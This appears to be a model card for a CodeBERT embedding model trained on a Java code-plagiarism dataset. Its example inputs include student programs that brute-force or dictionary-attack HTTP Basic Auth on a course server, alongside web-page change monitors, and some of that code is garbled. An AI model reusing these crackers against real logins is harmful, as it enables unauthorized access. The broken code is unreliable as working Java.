Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks
Paper • 1908.10084 • Published • 13
How to use buelfhood/SOCO-Java-CodeBERT-ST with sentence-transformers:
from sentence_transformers import SentenceTransformer
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERT-ST")
sentences = [
"import java.io.*;\nimport java.net.*;\nimport java.*;\nimport java.Runtime.*;\nimport java.Object.*;\nimport java.util.*;\nimport java.util.StringTokenizer;\n\npublic class Dictionary \n{\n String uname = \"\";\n String pword = \"null\";\n Vector v = new Vector();\n int runTime;\n public void doConnect(String connect, int num)\n {\n String = connect;\n \n try\n {\n URL secureSite = new URL();\n URLConnection connection = secureSite.openConnection();\n if (uname != null || pword != null)\n\t {\n\t \n\t for(int i=num; i<v.size(); i++)\n\t {\n\t pword = (String)v.elementAt(i);\n\t String up = uname + \":\" + pword;\n String encoding;\n try\n\t\t{\n\t\t connection.misc.BASE64Encoder encoder = (con.misc.BASE64Encoder) Class.forName(\".misc.BASE64Encoder\").newInstance();\n\t\t encoding = encoder.encode (up.getBytes());\n\t\t \n }\n\t catch (Exception ex) \n {\n\t\t Base64Converter encoder = new Base64Converter();\n\t\t System.out.println(\"in catch\");\n encoding = encoder.encode(up.getBytes());\n }\n\t connection.setRequestProperty (\"Authorization\", \" \" + encoding);\n connection.connect();\n if(connection instanceof HttpURLConnection)\n\t {\n\t HttpURLConnection httpCon=(HttpURLConnection)connection;\n if(httpCon.getResponseCode()==HttpURLConnection.HTTP_UNAUTHORIZED)\n\t\t {\n\t\t System.out.println(\"Not authorized - check for details\" + \" -Incorrect Password : \" + pword);\n\t doConnect(i, i+1);\n\t }\n\t\telse\n\t\t { \n\t\t System.out.println(\"\\n\\n\\nPassword for HTTP Secure Site by Dictionary Attack:\");\n\t System.out.println( +\"\\tPassword : \"+ pword);\n\n runTime = System.currentTimeMillis() - runTime; \n System.out.println(\"Time taken crack password (in seconds)\"+\" : \"+ runTime/1000+\"\\n\"+ \"Tries taken crack password : \"+ i);\n\t System.exit(0);\n\t }\n\t }\n\t }\n }\n }\n catch(Exception ex)\n {\n ex.printStackTrace();\n }\n }\n public Vector getPassword()\n {\n try\n {\n ReadFile rf = new ReadFile();\n rf.loadFile();\n v = 
rf.getVector();\n }\n catch(Exception ex)\n {\n ex.printStackTrace();\n }\n return v;\n } \n public void setTimeTaken( int timetaken)\n {\n runTime = timetaken;\n } \n public static void main ( String args[] ) throws IOException \n {\n \n runTime1 = System.currentTimeMillis(); \n Dictionary newDo = new Dictionary();\n newDo.setTimeTaken(runTime1);\n newDo. getPassword();\n String site = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n newDo.doConnect(site, 0);\n \n } \n \n}\n\nclass Base64Converter\n {\n \n public final char [ ] alphabet = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', \n 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', \n 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', \n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', \n 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', \n 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', \n 'w', 'x', 'y', 'z', '0', '1', '2', '3', \n '4', '5', '6', '7', '8', '9', '+', '/' }; \n \n \n public String encode ( String s )\n {\n return encode ( s.getBytes ( ) );\n }\n \n public String encode ( byte [ ] octetString )\n {\n int bits24;\n int bits6;\n \n char [ ] out\n = new char [ ( ( octetString.length - 1 ) / 3 + 1 ) * 4 ];\n \n int outIndex = 0;\n int i = 0;\n \n while ( ( i + 3 ) <= octetString.length ) {\n \n bits24=( octetString [ i++ ] & 0xFF ) << 16;\n bits24 |=( octetString [ i++ ] & 0xFF ) << 8;\n \n bits6=( bits24 & 0x00FC0000 )>> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0000003F );\n out [ outIndex++ ] = alphabet [ bits6 ];\n }\n \n if ( octetString.length - i == 2 )\n {\n \n bits24 = ( octetString [ i ] & 0xFF ) << 16;\n bits24 |=( octetString [ i + 1 ] & 0xFF ) << 8;\n bits6=( bits24 & 0x00FC0000 )>> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0 ) >> 
6;\n out [ outIndex++ ] = alphabet [ bits6 ];\n \n \n out [ outIndex++ ] = '=';\n }\n else if ( octetString.length - i == 1 )\n {\n \n bits24 = ( octetString [ i ] & 0xFF ) << 16;\n bits6=( bits24 & 0x00FC0000 )>> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n \n \n out [ outIndex++ ] = '=';\n out [ outIndex++ ] = '=';\n }\n \n return new String ( out );\n }\n }\n \n \n",
"\n\n\nimport java.io.*;\nimport java.util.*;\nimport java.*;\nimport java.net.*;\n\npublic class WatchDog\n{\n\n static Process p = null;\n static Process qproc = null;\n\n static BufferedReader bf = null;\n static StringTokenizer tok = null;\n\n static String Path = null;\n static String str = null;\n static String urlStr=null;\n static boolean changed = false;\n\n static File indexfile = new File(\"index.html\");\n static File tmpfile = new File(\"tmpindex.html\");\n static File mdfile = new File(\"md5file.txt\");\n static File tmpmdfile = new File(\"tmpmd5file.txt\");\n static PrintWriter mailwriter = null;\n\n\n public static void main (String[] args) \n {\n\n urlStr = \"http://www.cs.rmit.edu./\";\n\n try\n {\n \n mailwriter = new PrintWriter(new BufferedWriter(new FileWriter(\"tomail.txt\", false)));\n\n getLatest(urlStr);\n parseFile(); \n\n mailwriter.read();\n\n if(changed)\n {\n System.out.println(\"Sending Mail\");\n p = Runtime.getRuntime().exec(\"./mailscript\");\n p.waitFor();\n\n }\n else\n System.out.println(\" mail sent\");\n\n } catch (IOException ioe)\n {\n System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch (InterruptedException intex)\n {\n System.out.println(\"Interrupted Exception\");\n intex.printStackTrace();\n }\n\n\n }\n\n\n static void getLatest(String urlStr)\n { \n \n URL url = null;\n \n try\n {\n url = new URL(urlStr);\n\n } catch (MalformedURLException mfurl)\n {\n System.out.println(\"Malformed URL\");\n mfurl.printStackTrace();\n }\n\n try\n {\n mailwriter.println();\n\n p = Runtime.getRuntime().exec(\"/usr//pwd\"); \n p.waitFor();\n bf= new BufferedReader(new InputStreamReader(\n p.getInputStream()));\n\n Path=bf.readLine();\n\n if (indexfile.exists())\n {\n mailwriter.println(\"File with name 'index.html' found in directory.\");\n mailwriter.println(\"Renaming existing 'index.html' 'tmpindex.html...\");\n p = Runtime.getRuntime().exec(\"/usr//mv \"+indexfile+ \" \" + Path+\"/\"+tmpfile);\n p.waitFor();\n p 
= Runtime.getRuntime().exec(\"/usr//mv \"+mdfile+ \" \" + Path+\"/\"+tmpmdfile);\n mailwriter.println();\n mailwriter.println(\"File with name 'md5file.txt' found in directory.\");\n mailwriter.print(\"Renaming existing 'md5file.txt' 'tmpmd5file.txt...\");\n\n mailwriter.println(\".\");\n\n mailwriter.println();\n }\n\n mailwriter.println(\"Downloading current version of site - \" + urlStr);\n p = Runtime.getRuntime().exec(\"/usr/local//wget \"+url);\n p.waitFor();\n if (!tmpfile.exists())\n {\n mailwriter.println(\"File - \" + urlStr + \"index.html saved disk for the first time.\");\n }\n\n\n } catch (IOException ioe)\n {\n System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch (IndexOutOfBoundsException iobe)\n {\n System.out.println(\"Index Out Of Bounds Exception\");\n iobe.printStackTrace();\n }\n catch (Exception e)\n {\n System.out.println(\"Exception\");\n e.printStackTrace();\n }\n }\n\n static void parseFile()\n {\n\n Vector imgVect = new Vector();\n\n try\n {\n p = Runtime.getRuntime().exec(\"/usr//grep img \" + Path + \"/\"+ indexfile);\n p.waitFor();\n bf = new BufferedReader(new InputStreamReader(\n p.getInputStream()));\n\n while((str=bf.readLine())!=null)\n {\n bf = new StringTokenizer(str, \"\\\"\", false);\n \n while(bf.hasMoreTokens())\n {\n str=bf.nextToken();\n if ((str.indexOf(\"gif\") > 0) || (str.indexOf(\"jpg\") > 0))\n imgVect.addElement(str);\n }\n \n }\n\n }catch (IOException ioe)\n {\n System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch (Exception e)\n {\n System.out.println(\"Exception\");\n e.printStackTrace();\n }\n\n mailwriter.println(\"Creating file with md5sums of the webpage and images...\");\n md5Create(imgVect);\n\n }\n\n static void md5Create(Vector imgVect)\n {\n String tmpString = null;\n Vector imgNames = new Vector();\n\n try\n {\n PrintWriter pr = new PrintWriter(new BufferedWriter(new FileWriter(mdfile, false)));\n \n p=Runtime.getRuntime().exec(\"/usr/local//md5sum 
\"+indexfile);\n p.waitFor();\n bf= new BufferedReader(new InputStreamReader(\n p.getInputStream()));\n pr.println(bf.readLine());\n \n for(int i=0; i<imgVect.size();i++)\n {\n imgNames.insertElementAt((getImgNames((String)imgVect.elementAt(i))), i);\n imgVect.setElementAt((getFullPath((String)imgVect.elementAt(i))), i);\n\n p=Runtime.getRuntime().exec(\"/usr/local//md5sum \"+(String)imgNames.elementAt(i));\n p.waitFor();\n bf= new BufferedReader(new InputStreamReader(\n p.getInputStream()));\n pr.println(bf.readLine());\n rmImgFile(Path+\"/\"+(String)imgNames.elementAt(i));\n }\n pr.get();\n\n } catch (IOException ioe)\n {\n System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch (InterruptedException intex)\n {\n System.out.println(\"Interrupted Exception\");\n intex.printStackTrace();\n }\n\n if (tmpmdfile.exists())\n compVersions((imgVect.size())+1);\n\n }\n\n static void compVersions(int numlines)\n {\n\n int tmp = 0;\n int x = 0;\n String[] md5A = new String[numlines];\n Vector tmpmd5V = new Vector(); \n \n \n String[] tmpmd5A = null;\n StringTokenizer stoken = null;\n String mdImgName = null;\n String mdImgVal = null;\n String tmpImgName = null;\n String tmpImgVal = null;\n\n try\n {\n\n bf = new BufferedReader(new FileReader(mdfile));\n\n while((str = bf.readLine()) != null)\n {\n md5A[tmp]=str;\n tmp++;\n }\n\n bf = new BufferedReader(new FileReader(tmpmdfile));\n tmp=0;\n\n while ((str = bf.readLine()) !=null)\n {\n tmpmd5V.addElement(str);\n tmp++;\n }\n\n tmpmd5A = (String[])tmpmd5V.toArray(new String[tmpmd5V.size()]); \n\n if (tmpmd5A[0].compareTo(md5A[0]) != 0)\n {\n mailwriter.println(\"---The file index.html has changed.---\");\n mailwriter.println(\"-Diff of old and new -\");\n changed=true;\n mailwriter.println();\n p=Runtime.getRuntime().exec(\"/usr/local//diff index.html tmpindex.html\");\n p.waitFor();\n bf= new BufferedReader(new InputStreamReader(p.getInputStream()));\n\n while ((str = bf.readLine()) != null)\n 
mailwriter.println(str);\n\n }\n else\n {\n mailwriter.println(\"The file index.html hasn't changed.\");\n mailwriter.println();\n }\n\n mailwriter.println();\n mailwriter.println(\"Changes Images\");\n mailwriter.println(\"-----------------\");\n\n\n \n\n for (tmp=1; tmp<md5A.length; tmp++) \n {\n stoken = new StringTokenizer(md5A[tmp]);\n mdImgVal = stoken.nextToken();\n mdImgName = stoken.nextToken();\n for (x=1; x<tmpmd5A.length; x++)\n {\n stoken = new StringTokenizer(tmpmd5A[x]);\n tmpImgVal = stoken.nextToken();\n tmpImgName = stoken.nextToken();\n\n if (mdImgName.compareTo(tmpImgName) == 0)\n {\n if(mdImgVal.compareTo(tmpImgVal) == 0)\n {\n \n break;\n }\n else\n {\n mailwriter.println(\"The image \"+mdImgName+\" has changed.\");\n changed=true;\n break;\n }\n }\n if (x == ((tmpmd5A.length)-1))\n {\n mailwriter.println(\"The image \"+mdImgName+\" is new this \");\n changed=true;\n }\n }\n }\n\n for (tmp=1; tmp<tmpmd5A.length; tmp++) \n {\n stoken = new StringTokenizer(tmpmd5A[tmp]);\n tmpImgVal = stoken.nextToken();\n tmpImgName = stoken.nextToken();\n for (x=1; x<md5A.length; x++)\n {\n stoken = new StringTokenizer(md5A[x]);\n mdImgVal = stoken.nextToken();\n mdImgName = stoken.nextToken();\n if (tmpImgName.compareTo(mdImgName) == 0)\n {\n break;\n }\n if (x == ((md5A.length)-1))\n {\n mailwriter.println(\"The image \"+tmpImgName+\" is longer the \");\n changed=true;\n }\n }\n }\n\n\n } catch(IOException ioe)\n {System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch(InterruptedException iex)\n {System.out.println(\"Interrupted Exception\");\n iex.printStackTrace();\n }\n\n }\n\n\n static Object getFullPath(String fname)\n {\n \n\n if(fname.charAt(0)== '/') \n fname=urlStr+fname; \n else if(fname.charAt(0) != 'h')\n fname=urlStr+'/'+fname;\n\n getImgFile(fname);\n\n return (Object)fname; \n }\n\n static void getImgFile(String fullPath)\n {\n \n\n try\n {\n qproc=Runtime.getRuntime().exec(\"/usr/local//wget \"+fullPath);\n 
qproc.waitFor();\n\n } catch (IOException ioe)\n {\n System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch (InterruptedException intex)\n {\n System.out.println(\"Interrupted Exception\");\n intex.printStackTrace();\n }\n }\n\n static void rmImgFile(String delpath)\n {\n \n\n try\n {\n qproc=Runtime.getRuntime().exec(\"/usr//rm \"+ delpath);\n qproc.waitFor();\n\n } catch (IOException ioe)\n {\n System.out.println(\"IOException\");\n ioe.printStackTrace();\n }\n catch (InterruptedException intex)\n {\n System.out.println(\"Interrupted Exception\");\n intex.printStackTrace();\n }\n \n }\n\n static Object getImgNames(String prsName)\n {\n \n \n String str = new StringTokenizer(prsName, \"/\", false);\n\n while(str.hasMoreTokens())\n {\n str=bgf.nextToken();\n if ((str.indexOf(\"gif\") > 0) || (str.indexOf(\"jpg\") > 0))\n prsName=str;\n }\n return (Object)prsName;\n }\n}\n",
"import java.io.*;\nimport java.text.*;\nimport java.util.*;\nimport java.net.*;\n\npublic class WatchDog\n{\n private String address;\n private UnixMailing email;\n\n private int step = 0;\n private String buffer = \"\";\n\n public static void main(String [] args)\n {\n if (args.length < 2)\n {\n System.err.println(\"Invalid usage!\");\n System.err.println(\"Usage: java WatchDog <url> <email>\");\n System.exit(1);\n }\n\n String address = args[0];\n String email = args[1];\n WatchDog theProg = new WatchDog(address, email);\n\n try\n {\n File currDir = new File(\".\");\n File [] list = currDir.listFiles();\n for (int i = 0; i < list.length; i++)\n {\n if (list[i].getName().trim().startsWith(\"_buffer\"))\n list[i].delete();\n }\n }\n catch(Exception e) {}\n\n while (true)\n {\n theProg.checkPage();\n try\n {\n Thread.sleep();\n }\n catch(InterruptedException e ) {}\n }\n\n }\n\n public WatchDog(String address, String email)\n {\n this.address = address;\n this.email = new UnixMailing(email);\n }\n\n public void checkPage()\n {\n try\n {\n File buffFp = new File(\"_bufferFile.html\");\n Vector imgs = new Vector();\n\n boolean getAgain = false;\n if (buffFp.exists())\n {\n URLConnection conn = (new URL(address)).openConnection();\n conn.setDoInput(true);\n conn.connect();\n DataInputStream inNet = new DataInputStream(conn.getInputStream());\n\n System.out.println(\"Checking file \"+address);\n char i = '\\0';\n char f = '\\0';\n DataInputStream inFile = new DataInputStream(\n new FileInputStream(buffFp));\n try\n {\n int step = 0;\n while(true)\n {\n i = (char)inNet.readByte();\n f = (char)inFile.readByte();\n\n if (i != f)\n {\n email.println(\" changes in the content of the web: \"+address);\n System.out.println(\" changes in the content of the web: \"+address);\n getAgain = true;\n break;\n }\n tokenImages(i, imgs);\n }\n }\n catch(EOFException eofe) {}\n\n if (!getAgain)\n {\n try\n {\n i = (char)inNet.readByte();\n email.println(\" changes in the content of the 
web: \"+address);\n System.out.println(\" changes in the content of the web: \"+address);\n getAgain = true;\n }\n catch(EOFException eofe) {}\n try\n {\n f = (char)inFile.readByte();\n email.println(\" changes in the content of the web: \"+address);\n System.out.println(\" changes in the content of the web: \"+address);\n getAgain = true;\n }\n catch(EOFException eofe) {}\n }\n\n inFile.print();\n inNet.print();\n }\n else\n getAgain = true;\n\n\n if (getAgain)\n {\n getAgain = false;\n URLConnection conn = (new URL(address)).openConnection();\n conn.setDoInput(true);\n conn.connect();\n DataInputStream inNet = new DataInputStream(conn.getInputStream());\n\n System.out.println(\"Storing file \"+address);\n DataOutputStream outFile = new DataOutputStream(\n new FileOutputStream(buffFp));\n byte i = 0;\n try\n {\n while(true)\n {\n i = inNet.readByte();\n outFile.writeByte(i);\n tokenImages((char)i, imgs);\n }\n }\n catch(EOFException eofe) {}\n\n outFile.print();\n inNet.print();\n }\n for(int index = 0; index < imgs.size(); index++)\n checkImage(address, (String)imgs.get(index));\n email.sent();\n }\n catch(Exception e)\n {\n e.printStackTrace();\n }\n }\n\n\n public void tokenImages(char i, Vector imgs)\n {\n if (step == 1) \n {\n if (i == 'i' && buffer.length() <= 0 ||\n i == 'm' && buffer.equals(\"i\") ||\n i == 'g' && buffer.equals(\"im\"))\n {\n buffer += i;\n buffer = buffer.toLowerCase();\n }\n else\n {\n if (Character.isWhitespace(i) && buffer.equals(\"img\"))\n step = 2;\n else if (!Character.isWhitespace(i) || buffer.length() > 0)\n step = 0;\n buffer = \"\";\n }\n }\n else if (step == 2) \n {\n if (i == 's' && buffer.length() <= 0 ||\n i == 'r' && buffer.equals(\"s\") ||\n i == 'c' && buffer.equals(\"sr\"))\n {\n buffer += i;\n buffer = buffer.toLowerCase();\n }\n else\n {\n if (Character.isWhitespace(i) && buffer.equals(\"src\"))\n step = 3;\n else if (i == '=' && buffer.equals(\"src\"))\n step = 4;\n else if (i == '>')\n step = 0;\n buffer = \"\";\n 
}\n }\n else if (step == 3) \n {\n if (i == '=')\n {\n step = 4;\n }\n else if (!Character.isWhitespace(i))\n {\n if(i == '>')\n step = 0;\n else\n step = 2;\n buffer = \"\";\n }\n }\n else if (step == 4) \n {\n if (i == '\\\"')\n {\n step = 5;\n buffer = \"\";\n }\n else if (!Character.isWhitespace(i))\n {\n if(i == '>')\n {\n buffer = \"\";\n step = 0;\n }\n else\n {\n buffer = \"\"+i;\n step = 6;\n }\n\n }\n\n }\n else if (step == 5) \n {\n if (i == '\\\"')\n {\n if (buffer.trim().length() > 0)\n imgs.add(buffer);\n buffer = \"\";\n step = 0;\n }\n else\n buffer += i;\n }\n else if (step == 6) \n {\n if (Character.isWhitespace(i) || i == '>')\n {\n if (buffer.trim().length() > 0)\n imgs.add(buffer);\n buffer = \"\";\n step = 0;\n }\n else\n buffer += i;\n }\n else if(i == '<')\n {\n step = 1;\n buffer = \"\";\n }\n }\n\n public void checkImage(String hostUrl, String imageUrl)\n {\n try\n {\n String fullURL = \"\";\n if (imageUrl.startsWith(\"http\"))\n {\n fullURL = imageUrl;\n }\n else if (imageUrl.startsWith(\"/\"))\n {\n fullURL = \"http://\"+(new URL(hostUrl)).getHost()+imageUrl;\n }\n else\n {\n String path = (new URL(hostUrl)).getPath();\n if (!path.endsWith(\"/\"))\n path = path.substring(0, path.lastIndexOf('/')+1);\n\n fullURL = \"http://\"+(new URL(hostUrl)).getHost()+path+imageUrl;\n }\n\n File buffFp = new File(\"_buffer\"+\n (new URL(fullURL)).getPath().replaceAll(\"/\", \"_\"));\n Vector imgs = new Vector();\n\n boolean getAgain = false;\n if (buffFp.exists())\n {\n URLConnection conn = (new URL(fullURL)).openConnection();\n conn.setDoInput(true);\n conn.connect();\n DataInputStream inNet = new DataInputStream(conn.getInputStream());\n\n System.out.println(\"Checking image: \"+fullURL);\n byte i = 0;\n byte f = 0;\n DataInputStream inFile = new DataInputStream(\n new FileInputStream(buffFp));\n try\n {\n int step = 0;\n while(true)\n {\n i = inNet.readByte();\n f = inFile.readByte();\n\n if (i != f)\n {\n email.println(\"Image \"+fullURL+\" has 
been change!\");\n System.out.println(\"Image \"+fullURL+\" has been change!\");\n getAgain = true;\n break;\n }\n }\n }\n catch(EOFException eofe) {}\n\n if (!getAgain)\n {\n try\n {\n i = inNet.readByte();\n email.println(\"Image \"+fullURL+\" has been change!\");\n System.out.println(\"Image \"+fullURL+\" has been change!\");\n getAgain = true;\n }\n catch(EOFException eofe) {}\n try\n {\n f = inFile.readByte();\n email.println(\"Image \"+fullURL+\" has been change!\");\n System.out.println(\"Image \"+fullURL+\" has been change!\");\n getAgain = true;\n }\n catch(EOFException eofe) {}\n }\n\n inFile.print();\n inNet.print();\n }\n else\n getAgain = true;\n\n if (getAgain)\n {\n getAgain = false;\n URLConnection conn = (new URL(fullURL)).openConnection();\n conn.setDoInput(true);\n conn.connect();\n DataInputStream inNet = new DataInputStream(conn.getInputStream());\n\n System.out.println(\"Storing the image: \"+fullURL);\n DataOutputStream outFile = new DataOutputStream(\n new FileOutputStream(buffFp));\n byte i = 0;\n try\n {\n while(true)\n {\n i = inNet.readByte();\n outFile.writeByte(i);\n }\n }\n catch(EOFException eofe) {}\n\n outFile.print();\n inNet.print();\n }\n }\n catch(Exception e)\n {\n e.printStackTrace();\n }\n }\n}\n\n",
"import java.net.*;\nimport java.util.*;\n\npublic class BruteForce {\n\n public static void main(String[] args) {\n new CrackAttempt();\n }\n}\n\nclass CrackAttempt {\n public CrackAttempt() {\n final int MAX_LENGTH = 3;\n boolean auth = false;\n Date = new Date();\n boolean morePasswords = true;\n int passPtr = 0;\n StringBuffer validChars = new StringBuffer(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\");\n char[] password = new char[MAX_LENGTH];\n\n password[0] = validChars.charAt(0);\n while (!auth && morePasswords) {\n String resource = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n try {\n \n Authenticator.setDefault(new CrackAuth(password));\n URL url = new URL(resource);\n HttpURLConnection conn = (HttpURLConnection)url.openConnection();\n conn.setRequestMethod(\"HEAD\");\n if (conn.getResponseCode() == HttpURLConnection.HTTP_OK) {\n System.out.println(\"cracked with \" + new String(password));\n auth = true;\n }\n } catch (Exception e) {\n System.out.println(\" was exception: \" + e.getMessage());\n }\n int count = passPtr;\n while (true) {\n if (password[count] == validChars.charAt(validChars.length() - 1)) {\n password[count] = validChars.charAt(0);\n count--;\n } else {\n password[count] = validChars.charAt(validChars.indexOf(String.valueOf(password[count])) + 1);\n break;\n }\n if (count < 0) {\n \n if (passPtr < MAX_LENGTH - 1) {\n passPtr++;\n password[passPtr] = validChars.charAt(0);\n } else {\n morePasswords = false;\n }\n break;\n }\n }\n \n } \n if (!auth) {\n System.out.println(\"Unable determine password\");\n } else {\n time = (new Date()).getTime() - start.getTime();\n System.out.println(\"it took \" + String.valueOf(time) + \" milliseconds crack the password\");\n }\n }\n}\n\nclass CrackAuth extends Authenticator {\n char[] password;\n public CrackAuth(char[] password) {\n this.password = password;\n }\n\n protected PasswordAuthentication getPasswordAuthentication()\n {\n String user = \"\";\n return new PasswordAuthentication(user, 
password);\n }\n}\n"
]
embeddings = model.encode(sentences)
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [4, 4]

This is a sentence-transformers model finetuned from microsoft/codebert-base. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERT-ST")
# Run inference
sentences = [
'\nimport java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary\n{\n private String myUsername = "";\n private String myPassword = "";\n private String urlToCrack = "http://sec-crack.cs.rmit.edu./SEC/2";\n\n\n public static void main (String args[])\n {\n Dictionary d = new Dictionary();\n }\n\n public Dictionary()\n {\n generatePassword();\n }\n\n \n\n public void generatePassword()\n {\n try\n {\n BufferedReader = new BufferedReader(new FileReader("/usr/share/lib/dict/words"));\n\n \n {\n myPassword = bf.readLine();\n crackPassword(myPassword);\n } while (myPassword != null);\n }\n catch(IOException e)\n { }\n }\n\n\n \n\n public void crackPassword(String passwordToCrack)\n {\n String data, dataToEncode, encodedData;\n\n try\n {\n URL url = new URL (urlToCrack);\n\n \n\n dataToEncode = myUsername + ":" + passwordToCrack;\n\n \n\n encodedData = new bf.misc.BASE64Encoder().encode(dataToEncode.getBytes());\n\n URLConnection urlCon = url.openConnection();\n urlCon.setRequestProperty ("Authorization", " " + encodedData);\n\n InputStream is = (InputStream)urlCon.getInputStream();\n InputStreamReader isr = new InputStreamReader(is);\n BufferedReader bf = new BufferedReader (isr);\n\n \n {\n data = bf.readLine();\n System.out.println(data);\n displayPassword(passwordToCrack);\n } while (data != null);\n }\n catch (IOException e)\n { }\n }\n\n\n public void displayPassword(String foundPassword)\n {\n System.out.println("\\nThe cracked password is : " + foundPassword);\n System.exit(0);\n }\n}\n\n\n',
'\nimport java.io.*;\n\npublic class PasswordFile {\n \n private String strFilepath;\n private String strCurrWord;\n private File fWordFile;\n private BufferedReader in;\n \n \n public PasswordFile(String filepath) {\n strFilepath = filepath;\n try {\n fWordFile = new File(strFilepath);\n in = new BufferedReader(new FileReader(fWordFile));\n }\n catch(Exception e)\n {\n System.out.println("Could not open file " + strFilepath);\n }\n }\n \n String getPassword() {\n return strCurrWord;\n }\n \n String getNextPassword() {\n try {\n strCurrWord = in.readLine();\n \n \n \n }\n catch (Exception e)\n {\n \n return null;\n }\n \n return strCurrWord;\n }\n \n}\n',
'\n\n\nimport java.misc.BASE64Encoder;\nimport java.misc.BASE64Decoder;\n\nimport java.io.*;\nimport java.net.*;\nimport java.util.*;\n\n\npublic class BruteForce {\n \n static char [] passwordDataSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".toCharArray();\n \n private int indices[] = {0,0,0};\n \n private String url = null;\n\n \n public BruteForce(String url) {\n this.url = url;\n\n }\n \n private int attempts = 0;\n private boolean stopGen = false;\n \n public String getNextPassword(){\n String nextPassword = "";\n for(int i = 0; i <indices.length ; i++){\n if(indices[indices.length -1 ] == passwordDataSet.length)\n return null;\n if(indices[i] == passwordDataSet.length ){\n indices[i] = 0;\n indices[i+1]++;\n }\n nextPassword = passwordDataSet[indices[i]]+nextPassword;\n\n if(i == 0)\n indices[0]++;\n\n }\n return nextPassword;\n }\n \n public void setIndices(int size){\n this.indices = new int[size];\n for(int i = 0; i < size; i++)\n this.indices[i] = 0;\n }\n public void setPasswordDataSet(String newDataSet){\n this.passwordDataSet = newDataSet.toCharArray();\n }\n \n public String crackPassword(String user) throws IOException, MalformedURLException{\n URL url = null;\n URLConnection urlConnection = null;\n String outcome = null;\n String authorization = null;\n String password = null;\n BASE64Encoder b64enc = new BASE64Encoder();\n InputStream content = null;\n BufferedReader in = null;\n String line;\n int i = 0;\n while(!"HTTP/1.1 200 OK".equalsIgnoreCase(outcome)){\n url = new URL(this.url);\n urlConnection = url.openConnection();\n urlConnection.setDoInput(true);\n urlConnection.setDoOutput(true);\n\n\n urlConnection.setRequestProperty("GET", url.getPath() + " HTTP/1.1");\n urlConnection.setRequestProperty("Host", url.getHost());\n password = getNextPassword();\n if(password == null)\n return null;\n System.out.print(password);\n authorization = user + ":" + password;\n\n\n urlConnection.setRequestProperty("Authorization", " "+ 
b64enc.encode(authorization.getBytes()));\n\n\noutcome = urlConnection.getHeaderField(null); \n\n\n\n this.attempts ++;\n urlConnection = null;\n url = null;\n\n if(this.attempts%51 == 0)\n for(int b = 0; b < 53;b++)\n System.out.print("\\b \\b");\n else\n System.out.print("\\b\\b\\b.");\n\n }\n return password;\n }\n \n public int getAttempts(){\n return this.attempts;\n }\n public static void main (String[] args) {\n if(args.length != 2){\n System.out.println("usage: java attacks.BruteForce <url crack: e.g. http://sec-crack.cs.rmit.edu./SEC/2/> <username: e.g. >");\n System.exit(1);\n }\n\n BruteForce bruteForce1 = new BruteForce(args[0]);\n try{\n Calendar cal1=null, cal2=null;\n cal1 = Calendar.getInstance();\n System.out.println("Cracking started at: " + cal1.getTime().toString());\n String password = bruteForce1.crackPassword(args[1]);\n if(password != null)\n System.out.println("\\nPassword is: "+password);\n else\n System.out.println("\\nPassword could not retrieved!");\n cal2 = Calendar.getInstance();\n System.out.println("Cracking finished at: " + cal2.getTime().toString());\n Date d3 = new Date(cal2.getTime().getTime() - cal1.getTime().getTime());\n System.out.println("Total Time taken crack: " + (d3.getTime())/1000 + " sec");\n System.out.println("Total attempts : " + bruteForce1.getAttempts());\n\n }catch(MalformedURLException mue){\n mue.printStackTrace();\n }\n\n catch(IOException ioe){\n ioe.printStackTrace();\n }\n }\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
Dataset columns: sentence_0, sentence_1, and label

| | sentence_0 | sentence_1 | label |
|---|---|---|---|
| type | string | string | int |
| details |
|
|
|
| sentence_0 | sentence_1 | label |
|---|---|---|
|
|
0 |
|
|
0 |
|
import java.io.; |
0 |
BatchAllTripletLoss

- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- num_train_epochs: 1
- multi_dataset_batch_sampler: round_robin

